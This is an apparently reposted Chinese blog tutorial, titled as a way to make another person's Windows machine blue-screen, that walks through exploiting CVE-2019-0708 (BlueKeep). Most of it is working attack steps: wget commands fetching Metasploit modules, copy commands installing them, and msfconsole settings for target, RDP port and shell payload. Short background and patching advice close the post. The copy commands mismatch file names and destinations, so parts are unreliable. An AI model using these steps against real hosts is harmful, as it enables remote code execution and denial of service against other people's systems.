vmware 蓝屏_网络安全小百科--利用微软CVE 2019-0708漏洞让对方系统蓝屏死机
漏洞背景:
Windows 系列服務器于 2019 年 5 月 15 號,被爆出高危漏洞,該服務器漏洞利用方式是通過遠程桌面端口3389進行攻擊的。這個漏洞是今年來說危害嚴重性最大的漏洞,跟之前的永恒之藍病毒差不多。
2019年9月7日晚上凌晨 1 點左右,metaspolit 官方更新了漏洞利用程序。
漏洞危害:
CVE-2019-0708 漏洞是通過檢查用戶的身份認證,導致可以繞過認證,不用任何的交互,直接通過 rdp 協議進行連接發送惡意代碼執行命令到服務器中去。如果被攻擊者利用,會導致服務器被黑客入侵、感染病毒,像WannaCry永恒之藍一樣大規模的感染。
漏洞影響范圍:
該漏洞影響范圍較廣,Windows7 SP1、windows2003、windows2008和08 R2、windows xp 系統都會遭到攻擊。
漏洞復現環境準備:
CVE 2019-0708的exploit地址:
https://github.com/rapid7/metasploit-framework/pull/12283?from=timeline&isappinstalled=0ruby腳本地址:
https://github.com/rapid7/metasploit-framework/pull/12283/fileswget下載:
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rbwget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rbwget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rbwget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb復制到KALl MSF中
rdp.rb
cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep.rb
cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/rdp_scanner.rb
cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/cve_2019_0708_bluekeep_rce.rb
cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/開始復現:
攻擊命令
使用msfconsole
進入后使用reload_all重新加載模塊
使用use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
使用info查看工具相關信息以及設置
set RHOSTS 設置IP
set RPORT 設置RDP端口號
使用set target ID設置受害機機器
使用payload設置攻擊載荷
使用exploit開始攻擊,等待建立連接
Step1.打開kali,下載4個模塊
Step2. 復制到MSF文件中
如果出現無法找到rdp目錄,用mkdir創建一個目錄,運行文章上的4個復制命令到msf文件夾中。
Step3.運行msfconsole,重新加載模塊,use連接模塊
輸入”msfconsole”啟動msf,然后輸入” reload_all”重新加載模塊進入msf后,輸入search 0708 搜索攻擊模塊。(小技巧:直接use 編號 就能連接)
連接編號為3的攻擊模塊cve_2019_0708_bluekeep_rce
命令:use exploit/windows/rdp/cve_2019_0708_bluekeep_rce當連接攻擊模塊后查看攻擊設置命令: show options
RHOSTS=目標
RPORT=端口
Target: 目標版本對應的id
提示:
Target 1 =Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
Target2= Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)
Target3=Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)
Target4= Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)
設置目標ip:set RHOSTS 192.168.1.192(測試機器ip 目標為:win7)
設置攻擊版本: set target 3 (目標機器在vm上測試的)
重要一點:set payload windows/x64/shell_bitcp設置攻擊載荷(不設置情況可能攻擊失敗)
設置好目標ip以及targer運行:exploit 開始攻擊
經過測試發現會導致大部分機器藍屏,因為發布的exp為閹割版,所以大家請謹慎測試。
修復方案
1、最簡便的方法就是安裝一個安全管家,比如火絨、360之類的
2、把系統的自動更新打開或者到微軟官網下載補丁
3、設置防火墻規則,并關閉3389端口
總結
以上是生活随笔為你收集整理的vmware 蓝屏_网络安全小百科--利用微软CVE 2019-0708漏洞让对方系统蓝屏死机的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: +1和++的不同
- 下一篇: html中心对齐,html – 对齐内联